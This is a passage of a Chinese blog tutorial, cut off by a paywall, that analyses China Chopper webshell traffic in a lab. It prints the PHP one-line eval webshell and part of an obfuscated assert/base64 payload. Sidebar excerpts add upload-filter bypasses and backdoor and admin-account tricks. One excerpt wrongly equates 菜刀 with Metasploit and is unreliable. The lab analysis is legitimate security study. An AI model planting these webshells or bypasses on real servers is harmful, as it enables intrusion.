菜刀虚拟终端原理

最新推荐文章于 2023-10-27 00:21:49 发布
最新推荐文章于 2023-10-27 00:21:49 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: web渗透测试 代码审计 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40334963/article/details/105379547
版权
本文详细解析了菜刀虚拟终端的工作原理,通过win10虚拟机、phpstudy服务器、菜刀和wireshark进行实验。菜刀利用array_map()函数执行assert,再由assert执行base64解密后的PHP代码。代码中涉及关闭错误回显、设置执行时间、判断magic_quotes_gpc状态,以及拼接和执行系统命令。通过对proc_open的调用来执行系统命令,实现了远程控制服务器的目的。
摘要由CSDN通过智能技术生成

环境

win10虚拟机
phpstudy搭建的服务器
菜刀
wireshark

准备

向服务端上传一句话木马caidao.php

<?php
@eval($_POST['cmd']);
?>

配置好菜刀:
在这里插入图片描述服务器中打开wireshark进行监听

抓包分析

菜刀中打开虚拟终端并输入dir系统命令显示当前目录文件。
在这里插入图片描述
查看wireshark抓取的数据包信息
在这里插入图片描述抓取传输的数据:

array_map("ass"."ert",array("ev"."Al(\"\\\$xx=\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21h
最低0.47元/天 解锁文章
沙上有印
关注
专栏目录
一句话木马拿Shell与菜刀原理
悦分享
07-12 1556
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
中国菜刀原理与实践
悦分享
08-03 1646
中国菜刀(Chopper)是一款经典的网站管理工具,具有文件管理、数据库管理、虚拟终端等功能。服务端其中‍Sp4ar是连接密码,可以随意更改。也可对服务端做一些混淆操作。配置类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种主机地址 主机地址可为机器名或IP地址,如localhost数据库用户 连接数据库的用户名,如root数据库密码 连接数据库的密码,如123456。...
菜刀如何连接mysql_中国菜刀终端操作及数据库管理
weixin_29798625的博客
02-10 2937
实验环境操作机:Windows XP目标地址:172.16.12.2实验目的认识中国菜刀工具熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。实验内容内容预览尝试执行命令自定义终端路径配置数据库相关参数读取数据库信息和执行sql语句虚拟终端操作中国菜刀虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同...
中国菜刀的使用
xy_wjyjw的博客
10-27 204
中国菜刀实现与一句话木马联动:中国菜刀在本地(攻击机)。一句话木马在服务器(靶机)上。WebShell Manager管理工具。
网络安全实验十三 渗透测试项目
qq_64314976的博客
06-23 1974
步骤:在虚拟终端输入创建一个名叫hacker密码为111111的用户,但直接添加到管理组提升不了权限,远程桌面过去,输入账号hacker密码111111即可登录,登陆后发现没有administrators这个组,用whoami /all查看获取本地系统上所有用户(访问令牌)的用户名和组信息,注意到第一个的类型是别名(另外两个是已知),改名将hacker添加到管理组,成功执行,可以看到组成员多了一项。3、获得服务器上的关键敏感数据(C:\console)内。(网页关入侵--铜牌任务)(入侵提权--银牌任务)
内网渗透之——权限维持(获取windows、linux密码,安装后门程序)
wsnbbz的博客
03-23 7538
介绍 当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了 目的 由于攻击可能被发现,被发现后可能会被将之前拿到的的webshell清除,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的 获取系统登陆账号密码 windows获取系统登陆账号密码 windows系统账号密码存储位置: C...
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
【木马终端】————1、中国蚁剑的使用与功能介绍
Fly_鹏程万里
08-08 1万+
前言 说起webshell终端管理工具大多数人都会说“中国菜刀”,确实“中国菜刀”伴随着我们一起在网络安全道路上走了好久好久,它算的上是webshell终端管理工具的“启蒙导师”。今天给大家要介绍的是一个功能更加强大而且好用的webshell终端管理工具——中国蚁剑。 下载 中国蚁剑的项目地址:https://github.com/AntSwordProject/antSword ...
中国菜刀+文件上传漏洞一句话木马
dongxieaitonglao的博客
03-19 2278
<?php @eval($_POST['chopper']);?> <?php @eval($_REQUEST['cmd']);?> REQUEST是在网页端输入变量访问,POST则是使用中国菜刀之3类的工具连接,C/S架构。 编辑shell的时候,主机写 localhost egrep命令:查找文件内包含指定字符的文件。 中国菜刀的详细使用: 文件管理,查被上传木马网站的服务器文件架构 数据库管理,在编辑中配置完后,可以连接被上传木马网站的数据库(不知道,所以需要sql注入
技术剖析中国菜刀原理
TsengYUen920的博客
12-24 2294
一、自写脚本 @ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-&gt;|");;print(“hello PHP!”);;echo("|&lt;-");die(); 先用@ini_set(“display_errors”,“0”);临时关闭PHP的错误显示功能 @...
菜刀怎么接mysql_chopper菜刀一句话操作mysql数据库乱码问题 -电脑资料
weixin_30605469的博客
02-07 269
发现gbk等非gb2312的,用菜刀的一句话客户端工具连接后必然乱码,调整工具的编码方式没用,1.抓包base64解密:post变量中z0就是如下语句(没有红色的语句):@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_...
ctf之AWD(3)_重写菜刀
余韵
09-16 798
ctf之AWD(3)_重写菜刀 原理 多次post cmd=@eval(base64_decode($_POST[z0])); #cmd为原密码,z0为新密码 wireshark抓包分析 菜刀2011 post数据分析 &cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B &z0=QGluaV9zZXQoImRpc...
BugKuCTF 分析.1
vegetable_haker的博客
09-29 437
flag被盗 打开题目,发现文件是一个数据包,下载数据包 将下载下来的数据包用wareshark打开,往下滑,发现有一个post请求直接在这条数据包上右键追踪TCP流 发现flag 中国菜刀 下载压缩包,解压 打开数据包,发现第五条数据包有个post请求,在上面追踪TCP流,发现一船base64编码 复制,用在线编码解码,得到一段代码如下,它的作用是读取c:/wwwroot目录下所有文件、目录...
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1807
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
中国菜刀模拟实验
qq_41750748的博客
12-30 393
给win3虚拟机设置成桥接 此时物理机可以ping通虚拟机,但虚拟机不行 关闭物理机防火墙 然后就可以ping通了 虚拟机安装iis服务器 安装完成后去iis服务器设置 设置文件夹共享 在物理机桌面准备好1.txt 使用软件提交 文件就进入虚拟机了 因为传输不允许asp后缀文件 再使用move 将1.txt 复制成.asp文件 提交后生成新的.asp文件 再使用菜刀进行...
【BUGKU】CTF >>分析---中国菜刀
Chenamao的博客
08-09 2231
目录 【BUGKU】CTF >>分析---中国菜刀 【BUGKU】CTF >>分析---中国菜刀 解压完成后发现为pcapng文件格式 利用wireshark (我们的小鲨鱼)打开文件。 第一个数据包: 可以看出客户端用POST方式访问服务器的3.PHP文件 POST请求 123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."O..
WEBSHELL管理工具流量特征——基础篇
ALLEN'Blog
01-17 1747
今天给大家带来了WEBSHELL管理工具流量特征基础篇,简单介绍了菜刀和蚁剑这两个比较简单的流量特征,之后也会给大家带来别的WEBSHELL管理工具流量分析,如果夏欢本文希望可以一键三连支持一下。
兵临城下丨Webshell管理工具流量检测研究
C20220511的博客
05-16 729
引言 俗话说得好,80后用菜刀,90后用蚁剑,95后用冰蝎和哥斯拉。本文主要是对这四个主流的并具有跨时代意义的webshell管理工具进行流量分析和检测。 注:本文均以phpshell连接为例进行研究分析,毕竟“php是世界上最好的语言” ① 中国菜刀(chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理。主流有2011版本,2014版本和2016版本。 2011和2014版本: 特征..
kali菜刀安装教程
最新发布
08-28
Kali Linux是一个专门为安全评估、渗透测试和网络安全教育设计的操作系统。要在Kali Linux上安装软件或工具,特别是像“菜刀”(Metasploit Framework)这样的工具,通常通过包管理器进行。以下是安装Metasploit的基本步骤: 1. 打开终端:在Kali Linux桌面环境中,你可以通过快捷键`Ctrl + Alt + T`打开终端。 2. 更新系统:确保系统是最新的,输入并执行命令: ``` sudo apt-get update sudo apt-get upgrade ``` 3. 安装依赖:Metasploit需要一些依赖项,运行: ``` sudo apt-get install ruby-full libcap2-bin python-dev python-pip ``` 4. 安装Ruby:虽然Kali默认包含Ruby,但有时可能需要更新到最新版本,可以这样做: ``` gpg --keyserver pool.sks-keyservers.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 curl -L https://get.rvm.io | bash -s stable --ruby source ~/.rvm/scripts/rvm rvm use system ``` 5. 安装Metasploit:最后,你可以通过pip安装Metasploit框架: ``` gem install metasploit-framework ``` 6. 启动Metasploit:安装完成后,启动Metasploit框架: ``` msfconsole ``` 如果你遇到任何问题,可能是网络连接问题或权限不足,检查网络连通性,并确保有管理员权限进行上述操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值